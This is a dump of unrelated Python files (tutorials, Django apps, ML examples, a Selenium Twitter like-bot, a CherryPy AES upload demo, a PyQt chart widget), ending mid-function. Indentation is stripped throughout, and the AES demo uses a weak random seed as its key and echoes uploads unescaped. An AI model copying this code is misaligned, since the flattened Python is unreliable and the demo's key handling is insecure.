drum = loadDrum(drums)
t = loadTrack(args.track)
seq = synthesize(drum, t, speedRatio=args.speed, volRatio=10 ** (args.volume / 10), quiet=args.quiet)
seq.writeWav(args.output)
|
#methods of list
a=['hello','I','am','ritu','soni','I','am','happy']
#append
a.append(3)
print(a)
a.append(34)
a.append(4.45)
a.append(len(a))
a.append(True)
print(a)
x=a.append(56) #extend and append do not return anything x is none
print(x)
#extend(iterable)
b=[1,2]
x=a.extend(b)
print(x)
a.extend(b)
print(a)
#insert
a.insert(1,0)
print(a)
#remove parameter = value that we want to remove
a.remove('hello')
a.remove(1)
a.remove(2)
#pop parameter = index that we want to pop element from.
x=a.pop(8)
print(x)
#it removes the element from the list and return it
print(a)
#a.clear() clears whole list
#index
v=a.index('ritu',2)
print(v)
#count
c=a.count(1)
print(c)
# cant sort the list with mixed values of str and int by a.sort()
a.reverse()
print(a)
c=a.copy()
print(c)
z=[1,2,3,4,5,6]
print(z[-6:-3])
print(z[:])
|
from PowCapTools import ParseData
from PowCapTools import FindFile
def main():
fileName = '/home/henry/NeslStore/vikram/powcapData/Jason-Drive/mains_130313_030126-chan_1.dat'
start_at_second = 1
end_at_second = 20
window_second = 200e-3
sampRate = 1e6
analysis = "plot"
#fileCat = '/home/henry/Vikram_stuff/NASPOW/PowCapData/'
fileCat = '/home/henry/Vikram_stuff/NASPOW/Data1/EX2-PowCapData/'
#fileCat = '/home/henry/NeslStore/vikram/powcapData/Jason-Drive/'
#fileCat = '/home/henry/Vikram_stuff/RAW_DATA/'
year = '13'
month = '04'
day = '20'
datestr = year+month+day
hour = '11'
minute = '15'
second = '05'
timestr = hour+minute+second
f_search = FindFile(fileCat, datestr, timestr)
fileCatPath = [ fileCat + f_search.foundPath[0], fileCat + f_search.foundPath[1] ]
#fileCatPath = [ fileCat + f_search.latestFiles[0], fileCat + f_search.latestFiles[1] ]
p = ParseData(fileCatPath, 0, 20, window_second, sampRate)
#p = ParseData(fileCatPath, 0, 20, window_second, sampRate, analysis)
#p = ParseData(fileName, start_at_second, end_at_second, window_second)
main()
|
from django.db import models
from django.contrib.auth.models import User
from shop.models import Product,Category
class Profile(models.Model):
user = models.OneToOneField(User , on_delete=models.CASCADE)
auth_token = models.CharField(max_length=100 )
phone=models.IntegerField(default=+917447650728)
is_verified = models.BooleanField(default=False)
forget_password_token = models.CharField(max_length=100,default='0')
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.user.username
class Wishlist(models.Model):
wish_id= models.AutoField(primary_key=True,default='999')
user=models.ForeignKey(User,on_delete=models.CASCADE)
wish_prod=models.CharField(max_length=250, unique=True,default='ads123')
class Contact(models.Model):
msg_id = models.AutoField(primary_key=True)
name = models.CharField(max_length=50)
email = models.CharField(max_length=70, default="")
phone = models.CharField(max_length=70, default="")
desc = models.CharField(max_length=1000, default="")
def __str__(self):
return self.name
|
# Original Code here:
# https://github.com/pytorch/examples/blob/master/mnist/main.py
import os
import argparse
from filelock import FileLock
import tempfile
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
import ray
from ray import train, tune
from ray.train import Checkpoint
from ray.tune.schedulers import AsyncHyperBandScheduler
# Change these values if you want the training to run quicker or slower.
EPOCH_SIZE = 512
TEST_SIZE = 256
class ConvNet(nn.Module):
def __init__(self):
super(ConvNet, self).__init__()
self.conv1 = nn.Conv2d(1, 3, kernel_size=3)
self.fc = nn.Linear(192, 10)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 3))
x = x.view(-1, 192)
x = self.fc(x)
return F.log_softmax(x, dim=1)
def train_func(model, optimizer, train_loader, device=None):
device = device or torch.device("cpu")
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
if batch_idx * len(data) > EPOCH_SIZE:
return
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
def test_func(model, data_loader, device=None):
device = device or torch.device("cpu")
model.eval()
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (data, target) in enumerate(data_loader):
if batch_idx * len(data) > TEST_SIZE:
break
data, target = data.to(device), target.to(device)
outputs = model(data)
_, predicted = torch.max(outputs.data, 1)
total += target.size(0)
correct += (predicted == target).sum().item()
return correct / total
def get_data_loaders(batch_size=64):
mnist_transforms = transforms.Compose(
[transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]
)
# We add FileLock here because multiple workers will want to
# download data, and this may cause overwrites since
# DataLoader is not threadsafe.
with FileLock(os.path.expanduser("~/data.lock")):
train_loader = torch.utils.data.DataLoader(
datasets.MNIST(
"~/data", train=True, download=True, transform=mnist_transforms
),
batch_size=batch_size,
shuffle=True,
)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST(
"~/data", train=False, download=True, transform=mnist_transforms
),
batch_size=batch_size,
shuffle=True,
)
return train_loader, test_loader
def train_mnist(config):
should_checkpoint = config.get("should_checkpoint", False)
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
train_loader, test_loader = get_data_loaders()
model = ConvNet().to(device)
optimizer = optim.SGD(
model.parameters(), lr=config["lr"], momentum=config["momentum"]
)
while True:
train_func(model, optimizer, train_loader, device)
acc = test_func(model, test_loader, device)
metrics = {"mean_accuracy": acc}
# Report metrics (and possibly a checkpoint)
if should_checkpoint:
with tempfile.TemporaryDirectory() as tempdir:
torch.save(model.state_dict(), os.path.join(tempdir, "model.pt"))
train.report(metrics, checkpoint=Checkpoint.from_directory(tempdir))
else:
train.report(metrics)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="PyTorch MNIST Example")
parser.add_argument(
"--cuda", action="store_true", default=False, help="Enables GPU training"
)
parser.add_argument(
"--smoke-test", action="store_true", help="Finish quickly for testing"
)
args, _ = parser.parse_known_args()
ray.init(num_cpus=2 if args.smoke_test else None)
# for early stopping
sched = AsyncHyperBandScheduler()
resources_per_trial = {"cpu": 2, "gpu": int(args.cuda)} # set this for GPUs
tuner = tune.Tuner(
tune.with_resources(train_mnist, resources=resources_per_trial),
tune_config=tune.TuneConfig(
metric="mean_accuracy",
mode="max",
scheduler=sched,
num_samples=1 if args.smoke_test else 50,
),
run_config=train.RunConfig(
name="exp",
stop={
"mean_accuracy": 0.98,
"training_iteration": 5 if args.smoke_test else 100,
},
),
param_space={
"lr": tune.loguniform(1e-4, 1e-2),
"momentum": tune.uniform(0.1, 0.9),
},
)
results = tuner.fit()
print("Best config is:", results.get_best_result().config)
assert not results.errors
|
if __name__== "__main__":
filepointer = open('stateMachine_1.txt', 'r')
for line in filepointer:
print(line)
print("next")
filepointer.close()
|
'''
thin wrapper around sklearn classifiers, provide easy access and some additional model evaluation metrics
'''
import logging
import numpy as np
import scipy.stats
import scipy.sparse
from sklearn.linear_model import LogisticRegressionCV
class ModelTrainer(object):
def __init__(self):
self.model = None
self.feature_name_coef_map = None
def fit(self, feature_values, target_values, feature_names):
self.model = LogisticRegressionCV(penalty = "l2", max_iter = 200, cv = 10, class_weight = "balanced")
logging.info("start train logistic regression model with 10-fold cross validation")
self.model.fit(feature_values, target_values)
logging.info("train model finished, start evaluate model coefficients")
self.eval_model_coef(feature_values, feature_names)
return self
def eval_model_coef(self, feature_values, feature_names):
self.feature_name_coef_map = dict()
wald_stat = self.wald_test(feature_values)
wald = scipy.stats.wald()
w = wald_stat[0]
p_value = wald.pdf(w)
self.feature_name_coef_map["Intercept"] = (self.model.intercept_[0], w, p_value)
logging.info("Intercept: %f, wald: %f, p_value: %f" % (self.model.intercept_[0], w, p_value))
for idx in range(len(feature_names)):
coef = self.model.coef_[0][idx]
w = wald_stat[idx + 1]
p_value = wald.pdf(w)
self.feature_name_coef_map[feature_names[idx]] = (coef, w, p_value)
logging.info("%s: %f, wald: %f, p_value: %f" % (feature_names[idx], coef, w, p_value))
def predict(self, feature_values):
if self.model is None:
return None
return self.model.predict(feature_values)
def predict_proba(self, feature_values):
if self.model is None:
return None
proba = self.model.predict_proba(feature_values)
proba = proba[:, 1]
return proba
def get_feature_coef_map(self):
return self.feature_name_coef_map
def wald_test(self, X):
if self.model is None:
return
pred_probs = np.matrix(self.model.predict_proba(X))
X_design = np.hstack((np.ones(shape = (X.shape[0], 1)), X))
diag_array = np.multiply(pred_probs[:, 0], pred_probs[:, 1]).A1
V = scipy.sparse.diags(diag_array)
m1 = X_design.T * V
m2 = m1.dot(X_design)
cov_mat = np.linalg.inv(m2)
model_params = np.hstack((self.model.intercept_[0], self.model.coef_[0]))
wald_stats = (model_params / np.sqrt(np.diag(cov_mat))) ** 2
return wald_stats |
#https://www.hackerrank.com/challenges/game-of-thrones/problem
#!/bin/python3
import math
import os
import random
import re
import sys
def gameOfThrones(s):
s = ''.join(sorted(s))
palindrome = True if len(s) % 2 == 0 else False
i = 0
for j in range(0, len(s)):
if(s[i] != s[j]):
if((j - i) % 2 != 0):
if(palindrome):
return "NO"
palindrome = True
i = j
return "YES"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = gameOfThrones(s)
fptr.write(result + '\n')
fptr.close() |
# Copyright 2017 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from typing import Tuple
from pants.engine.fs import PathGlobs, Snapshot
from pants.source.filespec import matches_filespec
from pants.testutil.test_base import TestBase
class FilespecTest(TestBase):
def assert_rule_match(
self, glob: str, paths: Tuple[str, ...], *, should_match: bool = True
) -> None:
# Confirm in-memory behavior.
matched_filespec = matches_filespec({"includes": [glob]}, paths=paths)
if should_match:
assert matched_filespec == paths
else:
assert not matched_filespec
# Confirm on-disk behavior.
for expected_match in paths:
if expected_match.endswith("/"):
self.create_dir(expected_match)
else:
self.create_file(expected_match)
snapshot = self.request_single_product(Snapshot, PathGlobs([glob]))
if should_match:
assert sorted(paths) == sorted(snapshot.files)
else:
assert not snapshot.files
def test_matches_single_star_0(self) -> None:
self.assert_rule_match("a/b/*/f.py", ("a/b/c/f.py", "a/b/q/f.py"))
def test_matches_single_star_0_neg(self) -> None:
self.assert_rule_match("a/b/*/f.py", ("a/b/c/d/f.py", "a/b/f.py"), should_match=False)
def test_matches_single_star_1(self) -> None:
self.assert_rule_match("foo/bar/*", ("foo/bar/baz", "foo/bar/bar"))
def test_matches_single_star_2(self) -> None:
self.assert_rule_match("*/bar/b*", ("foo/bar/baz", "foo/bar/bar"))
def test_matches_single_star_2_neg(self) -> None:
self.assert_rule_match(
"*/bar/b*", ("foo/koo/bar/baz", "foo/bar/bar/zoo"), should_match=False
)
def test_matches_single_star_3(self) -> None:
self.assert_rule_match("*/[be]*/b*", ("foo/bar/baz", "foo/bar/bar"))
def test_matches_single_star_4(self) -> None:
self.assert_rule_match("foo*/bar", ("foofighters/bar", "foofighters.venv/bar"))
def test_matches_single_star_4_neg(self) -> None:
self.assert_rule_match("foo*/bar", ("foofighters/baz/bar",), should_match=False)
def test_matches_double_star_0(self) -> None:
self.assert_rule_match("**", ("a/b/c", "b"))
def test_matches_double_star_1(self) -> None:
self.assert_rule_match("a/**/f", ("a/f", "a/b/c/d/e/f"))
def test_matches_double_star_2(self) -> None:
self.assert_rule_match("a/b/**", ("a/b/d", "a/b/c/d/e/f"))
def test_matches_double_star_2_neg(self) -> None:
self.assert_rule_match("a/b/**", ("a/b",), should_match=False)
def test_matches_dots(self) -> None:
self.assert_rule_match(".*", (".dots", ".dips"))
def test_matches_dots_relative(self) -> None:
self.assert_rule_match("./*.py", ("f.py", "g.py"))
def test_matches_dots_neg(self) -> None:
self.assert_rule_match(
".*",
(
"b",
"a/non/dot/dir/file.py",
"dist",
"all/nested/.dot",
".some/hidden/nested/dir/file.py",
),
should_match=False,
)
def test_matches_dirs(self) -> None:
self.assert_rule_match("dist/", ("dist",))
def test_matches_dirs_neg(self) -> None:
self.assert_rule_match(
"dist/", ("not_dist", "cdist", "dist.py", "dist/dist"), should_match=False
)
def test_matches_dirs_dots(self) -> None:
self.assert_rule_match(
"build-support/*.venv/", ("build-support/blah.venv", "build-support/rbt.venv")
)
def test_matches_dirs_dots_neg(self) -> None:
self.assert_rule_match(
"build-support/*.venv/",
("build-support/rbt.venv.but_actually_a_file",),
should_match=False,
)
def test_matches_literals(self) -> None:
self.assert_rule_match("a", ("a",))
def test_matches_literal_dir(self) -> None:
self.assert_rule_match("a/b/c", ("a/b/c",))
def test_matches_literal_file(self) -> None:
self.assert_rule_match("a/b/c.py", ("a/b/c.py",))
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
class TwitterBot:
def __init__(self,username,password):
self.username=username
self.password=password
self.bot= webdriver.Firefox()
def login(self):
bot=self.bot
bot.get("https://twitter.com/")
time.sleep(2)
email= bot.find_element_by_class_name("email-input")
password= bot.find_element_by_name("session[password]")
email.clear()
password.clear()
email.send_keys(self.username)
password.send_keys(self.password)
password.send_keys(Keys.RETURN)
time.sleep(3)
def like_tweet(self,hashtag):
bot=self.bot
bot.get("https://twitter.com/search?q=" + hashtag +"&src=typeahead_click")
time.sleep(4)
for i in range(1,5):
bot.execute_script("window.scrollTo(0,document.body.scrollHeight)")
time.sleep(2)
tweets = bot.find_elements_by_class_name("css-1dbjc4n r-18u37iz r-thb0q2")
##data-testid="tweet" |
l = []
matrix = []
g = int(input("enter puzzleno:"))
print("enter puzzle")
for i in range(0,5):
l = list(raw_input())
matrix.append(l)
x = []
p = []
m = ' '
print("enter operations")
for y in range(0,1):
p = list(raw_input())
for j in range(0,5):
for t in range(0,5):
if matrix[j][t] == m:
e = j
c = t
ve = 0
for x2 in range(0,len(p)):
for x1 in range(0,5):
if matrix[x1][4] == ' ':
if p[x2] == 'R':
ve+=1
if ve>=1:
print("this puzzle has no configuration")
else:
for u in range(0,len(p)):
if p[u] == 'A':
temp = matrix[e][c]
matrix[e][c] = matrix[e-1][c]
matrix[e-1][c] = temp
e = e - 1
if p[u] == 'B':
temp = matrix[e][c]
matrix[e][c] = matrix[e+1][c]
matrix[e+1][c] = temp
e = e + 1
if p[u] == 'R':
temp = matrix[e][c]
matrix[e][c] = matrix[e][c+1]
matrix[e][c+1] = temp
c = c + 1
if p[u] == 'L':
temp = matrix[e][c]
matrix[e][c] = matrix[e][c-1]
matrix[e][c-1] = temp
c = c - 1
print("puzzle #:{}".format(g))
for f in range(0,5):
z = matrix[f]
s = ' '
print(s.join(z))
|
fac = [1]
n = 1
for x in range(1, 101):
n *= x
fac.append(n)
for _ in range(int(raw_input())):
print fac[int(raw_input())]
|
'''
Created on 2020. 2. 10.
@author: gd7
learnex1.py : 머신러닝 예제. 사이킷런 툴 사용하기
'''
from sklearn import svm #pip install sklearn
xor_data = [[0,0,0],[0,1,1],[1,0,1],[1,1,0]]
data = [] #샘플데이터
label = [] #결과값
#샘플데이터 생성
for row in xor_data :
p = row[0]
q = row[1]
r = row[2]
data.append([p,q])
label.append(r)
clf = svm.SVC() #머신러닝을 위한 객체
clf.fit(data,label) #기계를 학습시킴
#평가하기 위한 데이터 생성
sample_data = [[1,1],[1,0],[0,1],[1,1],[1,0],[0,0]]
#평가하기.pre : 예측되는 결과. 답안지
pre = clf.predict(sample_data)
ans = [0,1,1,0,1,0] #정답지
print("예측 결과 :",pre)
ok = 0
total = 0
for idx,answer in enumerate(ans) :
p = pre[idx]
if p == answer :
ok += 1
total += 1
print("정답률",ok,"/",total,"=",ok/total) |
from django.shortcuts import render, redirect, get_object_or_404,HttpResponse
from .form import DreamrealForm
from .models import book
def index(request):
return render(request, 'index.html')
def save_book1(request):
b_name = request.GET['name']
b_price = request.GET['price']
n_pages = request.GET['pages']
s_book = book(book_name=b_name,book_price=b_price,no_pages=n_pages)
try:
s_book.save()
return HttpResponse('success')
except:
return HttpResponse("error... ")
# def dreamreal(request):
# # form = DreamrealForm()
# return render(request, 'dreamreal.html')
# def create(request):
# if request.method == 'POST':
# form = DreamrealForm(request.POST)
# if form.is_valid():
# print('load')
# form.save()
# # this method will add a record in the table
# return redirect('index')
# else:
# print('error')
# form = DreamrealForm()
# return render(request, 'dreamreal1.html', {'form': form})
def create(request):
if request.method == 'POST':
form = DreamrealForm(request.POST)
if form.is_valid():
form.save()
# this method will add a record in the table
return HttpResponse('success')
else:
return HttpResponse("failed ... ")
else:
form = DreamrealForm()
return render(request, 'dreamreal1.html', {'form': form})
|
import os
import os.path
import random
import string
import cherrypy
import base64
from pyparsing import unicode
from Crypto.Hash import SHA256
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
LETTERS = string.ascii_uppercase
seed_number = ""
class StringGenerator(object):
@cherrypy.expose
def index(self):
return """
<html>
<head><title>Random Seed Generator</title></head>
<body>
<h1>Seed Number</h1>
<form action="generate_submitPage" method="get">
Generate Random Number:<input type="submit" />
</form>
<p1> Click Button for Generate Random Seed Number
</body>
</html>"""
def AES_Decrypt(self, upload_file, seed_number):
received_data = open(upload_file, "rb").read()
IV = received_data[:16] # 앞 부분 16바이트..
print("IV:", IV)
key_AES = SHA256.new(''.join(seed_number).encode()).digest()[:16] # Seed 값 기반으로 키 생성...
cipher_AES = AES.new(key_AES, AES.MODE_CBC, IV) # Web Server의 Private_Key를 읽어들임
decrypted_msg = unpad(cipher_AES.decrypt(base64.b32decode(received_data[16:])), AES.block_size)
return decrypted_msg.decode()
@cherrypy.expose
def upload_AES_File(self, myFile):
global seed_number
# upload_path = '/path/to/project/data/'
upload_path = os.path.dirname(__file__) # 임의의 폴더를 선택할 수 있도록 하는 부분
# 업로드된 파일을 저장하고자 하는 파일명 # 'saved.bin'으로 저장하도록 지정함
upload_filename = 'saved_AES.bin'
upload_file = os.path.normpath(os.path.join(upload_path, upload_filename))
size = 0
html_out_text = ""
with open(upload_file, 'wb') as out:
while True:
data = myFile.file.read(8192)
if not data:
break
out.write(data)
html_out_text += unicode(data)
print(data)
size += len(data)
out.close()
decrypted_message = self.AES_Decrypt(upload_file, seed_number) # RSA 복호화 과정을 수행하는 함수 호출
webpage_output = """
<html>
<h1>OK. Received File...</h1>
<p>Let's Decrypt File...
<p>Filename: {}
<p>Length: {}
<p>Mime-type: {}
<p>Received Data: {}
<p>
<p>
<p>Decrypted Data: {}
</html>
""".format(myFile.filename, size, myFile.content_type, html_out_text, decrypted_message)
# 결과를 리턴 --> 화면에 HTML 코드로 출력함...
return webpage_output
@cherrypy.expose
def generate_submitPage(self):
global seed_number
seed_number = random.sample(string.hexdigits, 8)
return """
<html>
<head><title>Random Seed Generator</title></head>
<body>
<h1>Seed Number</h1>
<p1>{}
<h2>Upload a file</h2>
<form action="upload_AES_File" method="post" enctype="multipart/form-data">
filename: <input type="file" name="myFile" /><br />
<input type="submit" />
</form>
<h2>Download a file</h2>
</body>
</html>""".format(''.join(seed_number))
@cherrypy.expose
def about(self):
return """
<html>
<head><title>About Us</title></head>
<body>
<h1>About Us</h1>
<p1> This is our first class python using cherrypy. </p1>
</body>
</html>
"""
if __name__ == '__main__':
#
# 실행 순서 (및 로직)
# 서버 : cherrypy_AES_with_OTP_WebServer.py 실행
# 서버 : http://127.0.0.1:8080 부분 클릭해서 웹서버 실행
# 클라이언트 : 웹 페이지에서 'Generate' 버튼을 클릭해서 Seed Number를 생성함
# 클라이언트 : cherrypy_AES_with_OTP_Client.py 실행
# 클라이언트 : 웹 페이지에 생성된 Seed Number를 긁어서 입력하고 엔터키 --> encrypted_data_AES_for_Upload.bin 생성됨
# 클라이언트 : 웹 페이지에 encrypted_data_AES_for_Upload.bin 파일을 업로드함
# 서버 : 업로드된 파일에 대해 복호화 과정을 자동으로 수행하고 복호화 결과를 화면에 표시함
# 서버 : 클라이언트로부터 업로드된 파일을 saved_AES.bin 파일로 생성함
cherrypy.quickstart(StringGenerator())
cherrypy.engine.exit() |
import dask.bag as db
import networkx as nx
import pandas as pd
import time
import json
import community
import collections
import matplotlib.pyplot as plt
from dask.distributed import Client, LocalCluster
from karateclub import EgoNetSplitter
def not_none(edge):
return edge is not None
def parse_edge(edge):
try:
return (int(edge[0]), int(edge[1]), pd.to_datetime(edge[2]))
except ValueError:
return None
def make_grouper(period):
def grouper(edge):
timestamp = (edge[2] - pd.Timestamp('1970-01-01')).total_seconds()
return timestamp // period, edge[0], edge[1]
def revert(tup):
ts = pd.Timestamp(tup[0] * period, unit='s').isoformat()
return (ts, tup[1])
return grouper, revert
def get_components(t):
# components = list(nx.connected_components(t[1]))
# return t[0], components
G = t[1]
try:
model = EgoNetSplitter()
model.fit(G)
partition = model.get_memberships()
communities = collections.defaultdict(set)
for node, groups in partition.items():
for group in groups:
communities[node].add(group)
except:
partition = community.community_louvain.best_partition(G)
communities = collections.defaultdict(set)
for node, group in partition.items():
communities[node].add(group)
return t[0], list(communities.values())
def combine_edges_to_graph(G: nx.Graph, edge):
G = G.copy()
G.add_edge(edge[0][1], edge[0][2], weight=edge[1])
return G
def graph_combine(G1: nx.Graph, G2: nx.Graph):
g1 = {(e[0], e[1]): e[2] for e in G1.edges(data='weight')}
g2 = {(e[0], e[1]): e[2] for e in G2.edges(data='weight')}
all_edges = set(g1.keys()) | set(g2.keys())
G = nx.Graph()
for edge in all_edges:
G.add_edge(edge[0], edge[1], weight=g1.get(edge, 0) + g2.get(edge, 0))
return G
def flatten(group):
return [{
'timestamp': group[0],
'nodes': list(component)
} for component in group[1]]
def find_components(inpath="data/02_normalize/*.csv", outpath="data/03_find_components/*.ndjson", period=24 * 60 * 60):
with open("data/meta/period.txt", "w+") as f:
f.write("<INVALID>")
lines = db.read_text(inpath)
edges = lines.str.strip().str.split(',')
edges = edges.map(parse_edge).filter(not_none)
key, revert = make_grouper(period)
sliced_weighted_edges = edges.foldby(key, lambda x, _: x + 1, 0, lambda x, y: x + y, 0).repartition(30)
slices = sliced_weighted_edges.foldby(lambda x: x[0][0], combine_edges_to_graph, nx.Graph(), graph_combine,
nx.Graph())
slices = slices.repartition(12).persist()
# store the first graph for diagnostics
example_ts, example_G = slices.take(1)[0]
weights = [e[2] for e in example_G.edges(data='weight')]
weights = [w/max(weights) for w in weights]
nx.write_edgelist(example_G, "diagnostics/03_find_components/network_structure.txt")
nx.draw_circular(example_G, with_labels=False, node_size=20, edge_color=weights)
plt.title(example_ts)
plt.savefig("diagnostics/03_find_components/network_structure.png")
# compute connected components
components = slices.map(get_components)
flattened_components = components.map(flatten).flatten()
flattened_components.map(json.dumps).to_textfiles(outpath)
with open("data/meta/period.txt", "w+") as f:
f.write(str(period))
if __name__ == '__main__':
cluster = LocalCluster(n_workers=12, threads_per_worker=1, memory_limit='166GB')
client = Client(cluster)
print(f"Serving on {client.dashboard_link} with {client.cluster}")
start = time.time()
find_components()
print(f"Ran in {time.time() - start:.2f}s")
|
from django.shortcuts import render
from .models import MyForm, MyImage
from django.views.generic import FormView
from PIL import Image
class MyImages(FormView):
form_class = MyForm
template_name = 'ex00/my_images.html'
initial = {'key': 'value'}
success_url = 'my_images'
def get(self, request):
form_class = MyForm
form = self.form_class(initial={'key': 'value'})
print('aaaa')
files = MyImage.objects.all()
return render(request, self.template_name, {'form': form, 'files':files})
def post(self, request):
form_class = MyForm(request.POST, request.FILES)
files = MyImage.objects.all()
if not form_class.is_valid():
return render(request, self.template_name, {'form':form_class, 'files':files})
title = form_class.cleaned_data.get('title')
img = form_class.cleaned_data.get('img')
new_img = MyImage(title=title, img=img)
new_img.save()
return render(request, self.template_name, {'form':form_class, 'files':files})
|
import random
def busqueda_binaria(valor):
inicio = 0
final = len(lista)-1
while inicio <= final:
puntero = (inicio+final)//2
if valor == lista[puntero]:
return puntero #ver que pasa si lo cambio por valor
elif valor > lista[puntero]:
inicio = puntero + 1
else:
final = puntero - 1
return None
def buscar_valor(valor):
res_busqueda = busqueda_binaria(valor)
if res_busqueda == None:
return f"El numero {valor}, no se encuentra"
else:
return f"El numero {valor}, se encuentra en la posicion {res_busqueda}"
"""si hubiesemos usado directamente busqueda_binaria(valor), ubiese tenido que correr toda la funcion de nuevo, pero con res_busqueda solo presenta el valor que se le asigno"""
if __name__ == '__main__':
tamano_de_lista = int(input('De que tamano es la lista? '))
valor = int(input('Que numero quieres encontrar? '))
lista = sorted([random.randint(0, 100) for i in range(tamano_de_lista)])
print(buscar_valor(valor))
print(lista)
|
import PyQt5.QtCore as QtCore
import PyQt5.QtGui as QtGui
from PyQt5.QtSvg import QSvgGenerator
from PyQt5.QtWidgets import QMainWindow, QAction, QFileDialog, QSizePolicy, QSplitter, QTableWidget, QTableWidgetItem
from PyQt5.QtGui import QPen, QColor, QBrush
from PyQt5.QtCore import QSize
from PyQt5.QtChart import QChart, QChartView, QSplineSeries, QValueAxis, QScatterSeries
import numpy as np
from cellphy.Analysis import Track, Channel
from .VTKWidget import VTKWidget
class LineSeries(QSplineSeries):
selected = QtCore.pyqtSignal(Track)
def __init__(self, x, y, track, color, name, parent=None):
QSplineSeries.__init__(self, parent)
self.clicked.connect(self.__selected)
self.hovered.connect(self.highlight)
self.track = track
self.old_pen = None
self.y = np.array(y)
self.x = np.array(x)
self.setColor(QColor(color[0], color[1], color[2], 255))
self.setPen(QPen(QBrush(self.color()), 2))
self.setName(name)
for i, p in enumerate(self.y):
self.append(self.x[i], p)
def __selected(self):
self.selected.emit(self.track)
def highlight(self, _, state):
if state:
self.old_pen = self.pen()
self.setPen(QPen(QtCore.Qt.black, self.old_pen.width()+2))
elif not state and self.old_pen is not None:
self.setPen(self.old_pen)
class ScatterSeries(QScatterSeries):
selected = QtCore.pyqtSignal(Track)
def __init__(self, x, y, track, color, name, parent=None):
QScatterSeries.__init__(self, parent)
self.clicked.connect(self.__selected)
self.hovered.connect(self.highlight)
self.track = track
self.old_pen = None
self.y = np.array(y)
self.x = np.array(x)
self.setColor(QColor(color[0], color[1], color[2], 0))
self.setPen(QPen(QBrush(self.color()), 2))
self.setBorderColor(QColor(color[0], color[1], color[2], 255))
self.setMarkerSize(10)
self.setName(name)
for i, p in enumerate(self.y):
self.append(self.x[i], p)
def __selected(self):
self.selected.emit(self.track)
def highlight(self, _, state):
if state:
self.old_pen = self.pen()
self.setPen(QPen(QtCore.Qt.black, self.old_pen.width() + 2))
elif not state and self.old_pen is not None:
self.setPen(self.old_pen)
class ChartView(QChartView):
def __init__(self, parent=None):
QChartView.__init__(self, parent)
def sizeHint(self):
return QSize(400, 400)
def save_svg(self):
file, _ = QFileDialog.getSaveFileName(self, "Save Dialog for Export SVG", QtCore.QDir.homePath(), "SVG (*.svg)")
if not file:
return
target_react = QtCore.QRectF(0.0, 0.0, self.sceneRect().size().width(), self.sceneRect().size().height());
svg_generator = QSvgGenerator()
svg_generator.setFileName(file)
svg_generator.setSize(self.sceneRect().size().toSize())
svg_generator.setViewBox(self.sceneRect())
painter = QtGui.QPainter(svg_generator)
self.render(painter, target_react, self.sceneRect().toRect())
painter.end()
class ChartViewWrapper(QMainWindow):
def __init__(self, parent=None):
QMainWindow.__init__(self, parent)
self.chart_view = ChartView()
self.setCentralWidget(self.chart_view)
self.tool_bar = self.addToolBar('MSDToolBar')
save_image_action = QAction('Export SVG', self)
save_image_action.triggered.connect(self.chart_view.save_svg)
self.tool_bar.addAction(save_image_action)
def sizeHint(self):
return QSize(400, 400)
class MSDWidget(QMainWindow):
msd_line_clicked = QtCore.pyqtSignal(Track)
def __init__(self, source_list, title, change_color=True, vtk_on=True, show_alfa_table=False, parent=None):
QMainWindow.__init__(self, parent)
self.vtk_on = vtk_on
self.show_alfa_table = show_alfa_table
self.setWindowTitle(title)
self.title = title
self.change_color = change_color
self.central_widget = QSplitter(self)
self.setCentralWidget(self.central_widget)
if type(source_list) is not list:
source_list = [source_list]
assert type(source_list[0]) in [Channel, Track]
if type(source_list[0]) is Channel:
self.init_channels(source_list)
else:
if self.change_color:
self.base_channel_color = source_list[0].color.copy()
self.init_tracks(source_list)
def init_channels(self, source_list):
pass
def init_tracks(self, source_list):
tracks = []
for track in source_list:
if len(track.time_position_map) > 3:
tracks.append(track)
msd_widget, msd_widget_velocity, alfa_all, alfa_lt_0_4, alfa_bt_0_4_1_2, \
alfa_gt_1_2, alfa_gt_1_2_n, alfa_gt_1_2_v = self.get_msd_chart(tracks)
# keeping this after MSD for change color to take effect
if self.vtk_on:
vtk_widget = self.get_vtk_widget(tracks)
self.central_widget.addWidget(vtk_widget)
if self.show_alfa_table:
alfa_table_widget = AlfaWidget(alfa_all, alfa_lt_0_4, alfa_bt_0_4_1_2, alfa_gt_1_2, alfa_gt_1_2_n, alfa_gt_1_2_v)
self.central_widget.addWidget(alfa_table_widget)
self.central_widget.addWidget(msd_widget)
if msd_widget_velocity is not None:
self.central_widget.addWidget(msd_widget_velocity)
def get_vtk_widget(self, tracks):
widget = VTKWidget(self)
for track in tracks:
if self.change_color:
alfa, _ = track.basic_fit()
widget.add_track(track, updated_color=self.get_alfa_color(alfa))
else:
widget.add_track(track)
# self.print(track_pos)
widget.render_lines()
# self.msd_line_clicked.connect(widget.highlight_track)
return widget
def get_msd_chart(self, tracks):
chart_view_wrapper = ChartViewWrapper(self)
chart = QChart()
chart.setTitle('Msd & Curve Fit')
chart_v = QChart()
chart_v.setTitle('Msd & Curve Fit with Velocity')
max_y = []
need_velocity = False
alfa_all = []
alfa_lt_0_4 = []
alfa_bt_0_4_1_2 = []
alfa_gt_1_2 = []
alfa_gt_1_2_v = []
alfa_gt_1_2_n = []
for track in tracks:
y = np.array(list(track.msd(limit=26)))
max_y.append(y.max())
x = np.array(list(range(1, len(y) + 1))) * 3.8
scattered_line = ScatterSeries(x, y, track, self.base_channel_color if self.change_color else track.color, track.name)
scattered_line.selected.connect(self.msd_line_clicked)
chart.addSeries(scattered_line)
alfa, __y = track.basic_fit()
alfa_all.append(alfa)
